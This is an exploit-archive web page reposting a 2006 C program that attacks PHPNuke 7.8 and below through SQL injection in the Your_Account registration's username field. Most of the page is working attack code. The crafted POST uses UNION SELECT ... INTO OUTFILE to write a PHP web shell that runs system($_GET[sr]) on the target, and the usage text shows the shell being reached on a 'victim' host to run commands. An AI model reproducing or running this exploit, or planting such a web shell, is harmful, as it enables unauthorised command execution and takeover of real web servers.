首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PHPNuke versions 7.8 and below remote SQL injection exploit
来源:http://www.securityreason.com/ 作者:sp3x 发布时间:2006-02-26  

]/*==================================================\
# SecurityReason.com |
# ( sp3x ) sp3x@securtiyreason.com |
# |
# /---------------------------\ |
# | Ctitical SQL INCJECTION | |
# | PHPNuke <= 7.8 | |
# \---------------------------/ |
# |
# PHPNuke-sp3x[1] |
# This exploit is based on 'username' |
# SQL injection vuln in Your_Account module. |
# |
# References: |
# securityreason.com/achievement_securityalert/32 |
# |
# ---| work only on mysql version > 4.0 |--- |
# |
#==================================================*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80 // port of the web server

void begin(void);
void sqlinj(int sock, char *argv[]);

int main(int argc, char *argv[]){

int sock;
struct sockaddr_in addr;
struct hostent *hp=0;

if(argc!=4) {
begin();
}

if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\n\n[-] Creating socket [FAILED]\n\n");
exit(EXIT_FAILURE);
}

printf("\n\n[+] Creating socket [OK]\n");

if((hp = gethostbyname(argv[1])) == 0) {
printf("[-] Resolving %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}

printf("[+] Resolving %s [OK]\n", argv[1]);

memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);

if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
printf("[-] Connecting at %s [FAILED]\n\n", argv[1]);
exit(EXIT_FAILURE);
}


printf("[+] Connecting at %s [OK]\n", argv[1]);

sqlinj(sock, argv);

printf("[+] Now check the shell\n"
"[+] http://%s\n\n",argv[1]);

shutdown(sock, 2);
close(sock);

return(0);

}

void begin(void){


printf("*---------------------------------------*\n"
"* SecurityReason *\n"
"* EXPLOIT for PHPNuke <=7.8 *\n"
"* Coded by : sp3x Date : 16.02.2006 *\n"
"*---------------------------------------*\n\n"
" Usage : \n"
" PHPNuke-sp3x[1] HOST /[path_phpnuke] [s_directory]\n\n"
" HOST - Host where is phpnuke example: localhost \n"
" [path_phpnuke] - PHPNuke directory\n"
" [s_directory] - shell directory where to upload\n\n"
" Example :\n\n"
" PHPNuke-sp3x[1] www.victim.com /phpnuke/html/ /home/sp3x/nuke78/html/shell.php \n"
" After this go to http://www.victim.com/phpnuke/html/shell.php?sr=ls \n\n");
exit(0);
return;

}

void sqlinj(int sock, char *argv[]){

FILE *go;
int size = 264;
go = fdopen(sock,"a");
if (go == 0) {
perror("[-] fdopen [FAILED]\n\n");
close(sock);
exit(EXIT_FAILURE);
}

setbuf(go,NULL);

size+=strlen(argv[3]);

fprintf(go,"POST %s HTTP/1.0\n"
"Connection: Keep-Alive\n"
"Pragma: no-cache\n"
"Cache-control: no-cache\n"
"Accept: text/html, image/jpeg, image/png, text/*, image/*, */*\n"
"Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identity\n"
"Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5\n"
"Accept-Language: en\n"
"Host: %s\n"
"Referer: http://%s%s?name=Your_Account&op=new user\n"
"User-Agent: SecurityReason - [SR]\n"
"Content-Type: application/x-www-form-urlencoded\n"
"Content-Length: %d\n\n"
"name=Your_Account&op=new user&user_email=securitybreak@securityreason.com&"
"user_password=hackme&user_password2=hackme&username="
"s'/**/UNION/**/SELECT/**/'<? echo \"SecurityReason Shell\";system($_GET
[sr]);'/**/FROM/**/nuke_authors/**/INTO/**/OUTFILE/**/'%s'/*\n\n"
"Cookie: lang=english\r\n\r\n",argv[2],argv[1],argv[1],argv[2],size,argv[3]);
printf("[+] Sending exploit [OK]\n\n");

}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Noah's Classifieds versions 1.
·SCO UnixWare ptrace Call Binar
·Mozilla Thunderbird : Remote C
·ArGoSoft FTP Server Remote Buf
·Apple Mac OS X / Safari __MACO
·Local privilege escalation exp
·Microsoft Windows Media Player
·iGENUS WebMail <= 2.0.2 rem
·PHPKit <= v.1.6.1 release 2
·Microsoft Windows Plug and Pla
·Microsoft Color Management Mod
·Snort Back Orifice Pre-process
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved